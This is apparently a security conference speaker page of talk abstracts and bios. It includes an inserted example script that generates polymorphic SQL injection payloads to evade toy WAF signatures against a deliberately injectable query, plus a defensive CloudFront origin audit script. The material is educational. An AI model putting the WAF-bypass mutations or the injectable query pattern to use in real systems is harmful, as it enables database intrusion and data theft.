Speakers

/* No simultaneous interpretation is available; however, we try to show the slides in both English and Japanese as much as we can. */

/* [en] means English speaker, [ja] means Japanese speaker. */

[en] "TSURUGI Linux - the sharpest weapon in your DFIR arsenal"

Giovanni Rattaro

Tsurugi is a heavily customized Linux distribution designed to support your DFIR investigations, malware analysis and open source intelligence (OSINT) activities. This open source project will be officially presented, and will become public, at the AVTokyo conference. During the talk, other parallel projects for acquisition and for live forensics will also be presented...

Giovanni Rattaro:

Giovanni 'Sug4r' Rattaro is a Senior IT security consultant at Openminded, a cybersecurity company based in Paris, Italian board member of the old BackTrack Linux project (now Kali Linux) and former DEFT Linux staff member.

Main interests: DFIR, cyber threat intelligence, botnet hunting, pentesting and social engineering.

Tsurugi Linux core developer.

[en] Open Source Intelligence using DeepWeb: Analysis of the correlation between malware and the open source

Dasom Kim & Seunggi Jeong

This presentation explains how to make the most of open source (publicly available) data and how to track the specific users the Horangi R&D team discovered. Based on open source information about malicious users, such as users who mainly sell malware targeted at a specific company and users who sell other users' data or personal information, we visualize their activities and analyze the associations between them.

Dasom Kim:

Dasom Kim is a researcher in CyberOps at Horangi Pte LTD. She is a final-year student at Kyungil University and a member of its anti-forensics research club. Her research interests include digital forensics, offender profiling, anti-forensics (steganography) and virtual reality.

Seunggi JEONG:

Seunggi JEONG is the Lead CyberOps Engineer in CyberOps at Horangi Pte LTD.

[en] Play with FILE Structure - Yet Another Binary Exploit Technique

Angelboy

To fight against prevalent cyber threats, more mechanisms to protect operating systems have been proposed recently. Specifically, approaches like DEP, ASLR and RELRO are frequently applied on Linux to hinder the exploitation of memory corruption vulnerabilities. In other words, it is more difficult for adversaries to exploit bugs to undermine system security.

In this session, we propose a new attack technique that exploits the FILE structure in the GNU C Library (glibc), and show how to circumvent the protections adopted by modern operating systems. In more detail, we demonstrate techniques to break data protection and achieve remote code execution. Moreover, we explore a methodology for using different FILE structures for attack, the so-called File Stream Oriented Programming.

There are also new mitigations in the latest version of glibc, but we can still abuse the FILE structure with our new approaches.

Angelboy:

Angelboy is a member of chroot and the 217 team. He researches Linux binary exploitation, especially heap-related exploitation. He has participated in many CTFs, such as HITB, DEFCON and Boston Key Party, won 2nd place in DEFCON CTF 2017 and 1st place in Boston Key Party 2016 and 2017 with the HITCON CTF team. He is also a speaker at conferences such as HITCON, VXCON and HITB.

[en] A mysterious watcher ? Red Eyes Group and their activities in South Korea

CHA Minseok(Jacky)

On January 31, 2018, KRCert warned users about a zero-day vulnerability in Adobe Flash Player (CVE-2018-4878). The first attack exploiting this vulnerability was made on Korean users in November 2017. It uses the Redoor malware to infect users in the last phase of the attack; DOGcall and ROKRAT belong to the same family as this malware. Redoor is known as the malware used in a Hancom Hangul (a Korean word processor) document disguised as a New Year address by North Korea in January 2017. However, the first attack using this malware had already occurred in the autumn of 2016.

Red Eyes Group, the hacking group behind the attack, is also referred to as ScarCruft, Group123, Ricochet Chollima, Reaper and APT37. Their profile is being built up slowly through the efforts of security vendors to gather, collate and analyze the attacks. The attacks are known to have been made not only in Korea, but also in Vietnam, Japan and the Middle East.

The main targets of the attacks in Korea seem to be North Korean defectors and human rights activists. Hancom Hangul is a word processor used widely within Korea, and it has been used in targeted attacks. Some of their attacks exploit zero-day vulnerabilities in Adobe Flash.

In this presentation, I will talk about the group's attack methods in South Korea, including the attack targets inferred from the decoy documents and the characteristics of the main malware. I will also use information gained from the code to profile the developer, and compare the attacks with those of a group that was active in 2015. There is a chance that this group has been active for longer than we thought.

CHA Minseok(Jacky):

CHA Minseok(Jacky) is a Senior Principal Malware Researcher at AhnLab. He joined AhnLab as a malware analyst in 1997.

He is a member of AVAR (Association of Anti-Virus Asia Researchers) and a reporter for the WildList Organization International.

He has been appointed as a member of the Private/Public Cooperative Investigation Group and Cyber Expert Group in South Korea.

He has spoken at security conferences including the AVAR Conference, CARO Workshop, CodeEngn, CodeGate, ISCR (International Symposium on Cybercrime Response) and others.

When he has free time, he enjoys old video games and old anime.

[ja] An Inconvenient Truth: Bypassing Ransomware Protection on Windows 10

Soya Aoyama

The WannaCry cyber attack of May 2017 is still fresh in our minds. This malware encrypted and ruined hundreds of thousands of computers in more than 150 countries.

As a countermeasure against ransomware, Microsoft introduced the "Ransomware protection" feature in the Windows 10 Fall Creators Update. How does this feature work? And is it really effective?

In this talk, I will explain the operating principle of "Controlled folder access", the core of "Ransomware protection", through demonstration videos. Next, I will show the requirements for bypassing this feature, and that it can be bypassed very easily. Finally, I will ask you whether the definition of a vulnerability needs to be reconsidered.

Soya Aoyama:

Security researcher at Fujitsu System Integration Laboratories.

More than 20 years of experience as a Windows software developer, including NDIS drivers, Bluetooth profiles and Winsock applications. Started security research three years ago.

Previous talks at AVTOKYO, BSidesLV, GrrCON, ToorCon and DerbyCon.

[en] Farewell, WAF - Exploiting SQL Injection from Mutation to Polymorphism

Boik Su

In this talk, we will not only go through the core ideas and concepts of the web application firewall (WAF) and some background on mutation testing against web applications, but also introduce a promising direction for automatically generating SQL injection attacks with polymorphism. We will give some case studies and bypasses for the latest version of ModSecurity (v3.1) alongside our demonstrations, and explain why common detections cannot help here. After the talk, the audience will appreciate the power of this concept and the beauty of the SQL language.
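The idea behind the abstract above, as an added example (not the speaker's tooling and not any of the ModSecurity bypasses from the talk): a seed SQL injection payload is rewritten by small semantics-preserving mutations, each variant is run through a toy regex filter standing in for a signature-based WAF rule, and then executed against an in-memory SQLite table so that equivalence to the seed is checked on real query results rather than assumed. The signatures, the schema and the mutation set are constructed for this example; the general shape (mutate, filter, verify equivalence) is what the talk's approach automates.

```python
"""Polymorphic SQL injection vs. a signature-based filter (added example).

Constructed for this page: toy regex signatures, an in-memory SQLite
table and five mutation operators. Not ModSecurity/CRS rules.
"""
import itertools
import re
import sqlite3
from typing import Callable, Dict, List, Tuple

# Toy signatures: the textbook "or 1=1" tautology and UNION SELECT.
TOY_SIGNATURES = [
    re.compile(r"\bor\b\s+1\s*=\s*1", re.IGNORECASE),
    re.compile(r"\bunion\b\s+select\b", re.IGNORECASE),
]


def waf_blocks(payload: str) -> bool:
    """Return True if any toy signature matches the raw payload."""
    return any(sig.search(payload) for sig in TOY_SIGNATURES)


def build_db() -> sqlite3.Connection:
    """In-memory table standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_input: str) -> List[Tuple]:
    """Deliberately vulnerable: user input is concatenated into the WHERE clause."""
    sql = f"SELECT id, name FROM users WHERE name = '{user_input}'"
    return conn.execute(sql).fetchall()


# Mutation operators. Each must preserve the SQL semantics of the payload.
def comment_as_whitespace(p: str) -> str:
    return p.replace(" ", "/**/")            # SQL treats /**/ as whitespace


def mixed_case(p: str) -> str:
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(p))


def swap_tautology(p: str) -> str:
    return p.replace("1=1", "2>1")           # any other always-true predicate


def parenthesise_tautology(p: str) -> str:
    return p.replace("1=1", "(1)=(1)")


def like_tautology(p: str) -> str:
    return p.replace("1=1", "1 like 1")      # SQLite compares these as text


MUTATIONS: Dict[str, Callable[[str], str]] = {
    "comment-as-whitespace": comment_as_whitespace,
    "mixed-case": mixed_case,
    "swap-tautology": swap_tautology,
    "parenthesise-tautology": parenthesise_tautology,
    "like-tautology": like_tautology,
}


def polymorphic_variants(seed: str, max_depth: int = 2) -> Dict[str, str]:
    """Apply every ordered combination of up to max_depth mutations; dedupe by payload."""
    variants: Dict[str, str] = {}
    seen = {seed}
    for depth in range(1, max_depth + 1):
        for combo in itertools.permutations(MUTATIONS, depth):
            payload = seed
            for name in combo:
                payload = MUTATIONS[name](payload)
            if payload not in seen:
                seen.add(payload)
                variants["+".join(combo)] = payload
    return variants


def find_bypasses(seed: str) -> List[Tuple[str, str]]:
    """Variants that pass the filter AND return exactly the rows the seed returns."""
    conn = build_db()
    expected = vulnerable_lookup(conn, seed)      # what the attacker wants
    bypasses = []
    for name, payload in polymorphic_variants(seed).items():
        if waf_blocks(payload):
            continue
        try:
            rows = vulnerable_lookup(conn, payload)
        except sqlite3.Error:
            continue                              # mutation broke the SQL
        if rows == expected:
            bypasses.append((name, payload))
    return bypasses


if __name__ == "__main__":
    seed = "x' or 1=1 -- "
    print("seed blocked by filter:", waf_blocks(seed))
    for name, payload in find_bypasses(seed):
        print(f"{name:45s} {payload!r}")
```

Case mixing alone does not get past the filter (the regex is case-insensitive), but any rewrite that changes the token shape while keeping the predicate true does, which is the point the abstract makes about why signature matching cannot keep up with a generator of equivalent SQL.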

Boik Su:

Syue-Siang Su (Boik) has four years of experience in web development and actively uses OSS to create and manage applications and gadgets for his research in web security. He has received awards from CTFs, been a speaker at OSCON 2018, AVTokyo 2017 and Taiwan Modern Web 2017, and a lecturer at Taiwan HITCON Training and the National Center for Cyber Security Technology.

* http://boik.com.tw/

[ja] Occam's Razor: A Forensics Story

白船(田中ザック/Isaac Mathis)

I'll give a fun talk about DFIR.

白船(田中ザック/Isaac Mathis):

Organizer of the Yamato Security study group (@yamatosecurity). Former researcher at Carnegie Mellon University. SANS 504 instructor. Proactive Defense CTO at Kobe Digital Labo (KDL). Hocchiku (bamboo flute) player. Professional-level gardener.

[ja] Building CTF: Beyond Thousands of Failures

Nomuken

CTFs are known as very enjoyable hacker contests; in Japan, SECCON is especially well known. This time I will talk about how to run a CTF, and about my own failures in running one.

Nomuken:

I'm an otaku; I like "Is the Order a Rabbit?" (ご注文はうさぎですか?) and Hatsune Miku. I also serve on the SECCON organizing committee.

[ja] I Was Looking at CloudFront and Found Some Dangerous-Looking Data

尾﨑 光芳 / 白石 三晃 / 小峰 里美

Amazon CloudFront is a content delivery network (CDN) service. CloudFront offers a wide range of configuration options so that content can be delivered quickly and accessed conveniently. However, if those settings are misconfigured, they can become a security problem.

During a penetration test, we found a strange host that was accessible only via CloudFront. We also confirmed that someone had stored confidential information on that host, such as an FTP server hostname and credentials. In this session, we present what was discovered, how we identified the cause, and the results of checking whether other similar hosts exist.
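A way to check one's own account for the kind of host described above, as an added example (not the authors' tooling and not the specific host from the talk): walk every enabled distribution, flag custom origins whose hostname is not under a domain the team owns, and, as a generalization to other CloudFront settings the page only alludes to, flag plaintext origin or viewer protocol policies and S3 origins with no origin access identity. The input is in the shape returned by boto3's CloudFront list_distributions call, and the field names are real CloudFront API fields, but the SAMPLE data and every hostname in it are constructed for this example.

```python
"""Audit CloudFront distribution configs for unrecognised origins and weak
transport settings (added example; SAMPLE is constructed, hostnames fictitious).
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Constructed sample in the shape of boto3 cloudfront.list_distributions() output.
SAMPLE = {
    "DistributionList": {
        "Items": [
            {
                "Id": "EDIST0000001",
                "DomainName": "d111111abcdef8.cloudfront.net",
                "Enabled": True,
                "Origins": {"Items": [
                    {"Id": "web", "DomainName": "www.example.com",
                     "CustomOriginConfig": {"OriginProtocolPolicy": "https-only"}},
                ]},
                "DefaultCacheBehavior": {"ViewerProtocolPolicy": "redirect-to-https"},
            },
            {
                "Id": "EDIST0000002",
                "DomainName": "d222222abcdef8.cloudfront.net",
                "Enabled": True,
                "Origins": {"Items": [
                    # An origin nobody on the team recognises: the kind of
                    # "strange host reachable only through CloudFront" to chase down.
                    {"Id": "old-tools", "DomainName": "tools-old.example.net",
                     "CustomOriginConfig": {"OriginProtocolPolicy": "http-only"}},
                    {"Id": "assets", "DomainName": "assets-bucket.s3.amazonaws.com",
                     "S3OriginConfig": {"OriginAccessIdentity": ""}},
                ]},
                "DefaultCacheBehavior": {"ViewerProtocolPolicy": "allow-all"},
            },
        ]
    }
}


@dataclass
class Finding:
    distribution: str
    origin: str      # origin Id, or "-" for distribution-level findings
    check: str
    detail: str


def _under_owned_domain(host: str, owned: Iterable[str]) -> bool:
    """True if host equals an owned domain or is a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in owned)


def audit_distributions(dist_list: Dict, owned_domains: Iterable[str]) -> List[Finding]:
    """Return findings for every enabled distribution in dist_list."""
    owned = [d.lower() for d in owned_domains]
    findings: List[Finding] = []
    for dist in dist_list["DistributionList"].get("Items", []):
        if not dist.get("Enabled", False):
            continue
        did = dist["Id"]
        viewer = dist.get("DefaultCacheBehavior", {}).get("ViewerProtocolPolicy")
        if viewer == "allow-all":
            findings.append(Finding(did, "-", "viewer-plaintext",
                                    "viewers may fetch over plain HTTP"))
        for origin in dist.get("Origins", {}).get("Items", []):
            oid = origin["Id"]
            host = origin["DomainName"].lower()
            custom = origin.get("CustomOriginConfig")
            s3 = origin.get("S3OriginConfig")
            if custom is not None:
                if not _under_owned_domain(host, owned):
                    findings.append(Finding(did, oid, "unknown-origin",
                                            f"{host} is not under an owned domain; "
                                            "find out who runs it and what it serves"))
                if custom.get("OriginProtocolPolicy") == "http-only":
                    findings.append(Finding(did, oid, "origin-plaintext",
                                            f"CloudFront fetches {host} over plain HTTP"))
            if s3 is not None and not s3.get("OriginAccessIdentity"):
                findings.append(Finding(did, oid, "s3-no-oai",
                                        f"{host} has no origin access identity; the "
                                        "bucket may be reachable directly"))
    return findings


if __name__ == "__main__":
    for f in audit_distributions(SAMPLE, ["example.com"]):
        print(f"{f.distribution} {f.origin:10s} {f.check:17s} {f.detail}")
```

Against a real account, feed it the pages from `boto3.client("cloudfront").get_paginator("list_distributions")` instead of SAMPLE; the "unknown-origin" findings are the list of hosts to visit through the distribution, which is how a forgotten origin holding credentials would surface.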

尾﨑 光芳:

SecureWorks Japan, security assessment team

白石 三晃:

SecureWorks Japan, security assessment team

小峰 里美:

SecureWorks Japan, security assessment team